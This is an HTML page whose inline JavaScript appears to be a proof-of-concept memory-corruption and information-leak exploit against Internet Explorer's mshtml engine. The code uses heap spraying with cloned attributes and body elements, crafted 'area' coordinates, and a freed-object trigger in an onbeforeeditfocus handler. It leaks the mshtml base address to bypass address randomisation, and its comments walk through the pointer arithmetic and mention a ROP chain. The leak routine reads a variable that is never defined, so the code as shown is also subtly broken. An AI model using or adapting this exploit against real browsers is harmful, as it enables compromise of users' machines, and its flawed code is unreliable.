Untitled

<!doctype html>
<HTML>
  <head>
    <script>

      lfh = new Array(20);
      for(i = 0; i < lfh.length; i++) {
        lfh[i] = document.createElement('div');
        lfh[i].className = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
      }

      function setinput() {
        try { document.write('Timber'); } catch(e) {}

        // I used 2 area element to make sure we reoccupy freed memory (there is a reason behind this that doesnt fit on this page)
        d = document.createElement('area');
        d.shape = "poly"
        // Our BString pointer is located at: 0x12010020 + 0x8
        // We want to INCrement 0x12010020 + 0x8 + 1  to add 0x100 and not 0x1
        // The code does: inc     dword ptr [esi+0A0h]   so we need to substract 0xAO from the values leaving 0x1200FF89 which is 302055305 decimal
        d.coords = "1,2,289603465,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";
        d2 = document.createElement('area');
        d2.shape = "poly"
        d2.coords = "1,2,289603465,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";

        a = document.createElement("div");
        a.clearAttributes()

        //Step 1
        for(i = 0; i < 0x7ffe; i++) {
            a.setAttribute("attr" + i, null);
        }
        mem = new Array(400);
        // Step 2
        for(i = 0; i < mem.length; i++) {
          mem[i] = a.cloneNode(1);
        }

        bodies = new Array()
        // Step 3
        for(j = 0; j < mem.length; j++) {
          for(i = 0; i < 0x7ffe; i += 0x1000) {
            // Step 3.1
            mem[j].setAttribute("attr" + i, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
            // Step 3.2
            b = document.createElement('body');
            b.title = 'a';
            b.id = 'a';
            b.text = 'a'
            b.bgColor = 1
            b.topMargin = 1
            b.bottomMargin = 1
            b.leftMargin = 1
            b.rightMargin = 4
            b.setAttribute('ropchain', bodies.length)  // This will actualy give us the index of the body element we are leaking.
            bodies.push(b);
          }
        }
        // Saving the attributes so Garbage Collection wont kill them accidentally
        document.body.setAttribute('mem', mem)
        document.body.setAttribute('bodies', bodies)
        return true
      }

      function loaded() {
        document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
        // Step 4
        document.getElementsByTagName('input')[0].focus();

        // Step 6
        for(j = 0; j < mem.length; j++) {
          for(i = 0; i < 0x7ffe ; i += 0x1000) {
            //Step 7
            if(mem[j].getAttribute("attr" + i).length != 0x45) {
              //Step 9
              LeakInfo = "Size of the attribute is = " + data.length + "\n";
              LeakInfo += "Raw data: \n"
              LeakInfo += escape(data) + "\n\n";
              mshtmlAddress = data.charCodeAt(4) + data.charCodeAt(5) * 0x10000
              LeakInfo += "Address of mshtml code is 0x" + mshtmlAddress.toString(16) + "\n";
              bodyindex = data.charCodeAt(14) + data.charCodeAt(15) * 0x10000
              LeakInfo += "Index of the leaked body = 0x" + bodyindex.toString(16);
              alert(LeakInfo);
            }
          }
        }
      }
    </script>
  </head>
  <body onload="loaded();">
    <input value="mydata" type="text"></input>
  </body>
</html>